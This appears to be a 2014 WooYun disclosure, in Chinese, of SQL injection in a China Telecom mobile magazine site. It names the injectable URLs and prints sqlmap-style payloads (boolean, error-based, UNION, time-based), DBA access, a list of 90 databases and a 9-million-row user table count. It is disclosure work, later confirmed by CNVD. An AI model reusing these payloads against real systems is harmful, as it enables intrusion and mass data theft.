乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-03-24: 细节已通知厂商并且等待厂商处理中 2014-03-28: 厂商已经确认,细节仅向厂商公开 2014-04-07: 细节向核心白帽子及相关领域专家公开 2014-04-17: 细节向普通白帽子公开 2014-04-27: 细节向实习白帽子公开 2014-05-08: 细节向公众公开
电信DBA权限,天翼189邮箱数据存在全部脱掉的风险,这只是冰山一角!心惊胆战!真心只做了count,900W+的用户数据。。。
http://gdwap.dooland.com/ 中国电信手机杂志注入点:http://gdwap.dooland.com/b.php?id=8592http://gdwap.dooland.com/pic.php?pid=98992&page=3&articleid=383661http://gdwap.dooland.com/s.php?id=4
心惊胆战!不希望被查水表,简单计算下countDBA权限:
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=8592 AND 3762=3762 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=8592 AND (SELECT 5042 FROM(SELECT COUNT(*),CONCAT(0x7165686471,(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END)),0x7166656c71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: id=-9447 UNION ALL SELECT NULL,NULL,CONCAT(0x7165686471,0x664c546363734249726b,0x7166656c71)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=8592 AND SLEEP(5)---web application technology: PHP 5.3.10back-end DBMS: MySQL 5.0current user is DBA: True
数据库list:
available databases [90]:[*] A_Bank[*] ads[*] adstat[*] adsystem[*] ahvnet[*] api_site_chinagames[*] api_site_tttz[*] asus[*] bbappnet[*] billwang[*] business[*] client[*] collector[*] common[*] cover[*] dayoo[*] dongyou[*] DoolandERP[*] doolandmanager[*] DownLoadInfoDB[*] dudubao[*] dudubao_bak[*] dudubao_book[*] dudubao_gztv[*] dudubao_hd[*] eben[*] expand[*] fhxxw[*] gdvnet[*] gdvnet2[*] gdwap[*] gxvnet[*] gzvnet[*] hzkzy[*] ifeng[*] information_schema[*] ipad_adsys[*] JIANBAO[*] jigou[*] jsvnet[*] jxvnet[*] kindle_caixin[*] kuanzon[*] lcbook[*] lephone[*] lib[*] mag_pub[*] magazine_upload[*] mysql[*] news[*] newspaper[*] OEM[*] opds_aldiko[*] paycenter[*] qinghua[*] qqcaibei[*] readstat[*] ReadStat[*] sctfds[*] scvnet[*] seo[*] shop_car[*] sina_book[*] sina_mag_cooperation[*] stat_dudubao[*] stat_gxvnet[*] stat_jxvnet[*] stat_paihang[*] suzhmobile[*] system_check[*] test[*] tob_client[*] ty189[*] ty189_mail[*] ty189_mail_hd[*] ty189_mail_new[*] ty189_mail_test[*] ucenter[*] unicom[*] union[*] vip_statistics[*] vnet139[*] wangyi163[*] wap[*] xjvnet[*] ynvnet[*] zazhishe[*] zhongshan[*] zhuanti[*] zjvnet
数据库ucenter里的uc_members 900W+
Database: ucenter+------------+---------+| Table | Entries |+------------+---------+| uc_members | 9125129 |+------------+---------+
数据库ty189_mail也有几十万的数据就不列举了。。。抓紧修复!
您懂得!
危害等级:高
漏洞Rank:17
确认时间:2014-03-28 15:44
CNVD确认并复现所述情况,已经转由CNCERT直接通报给中国电信集团公司处置。
暂无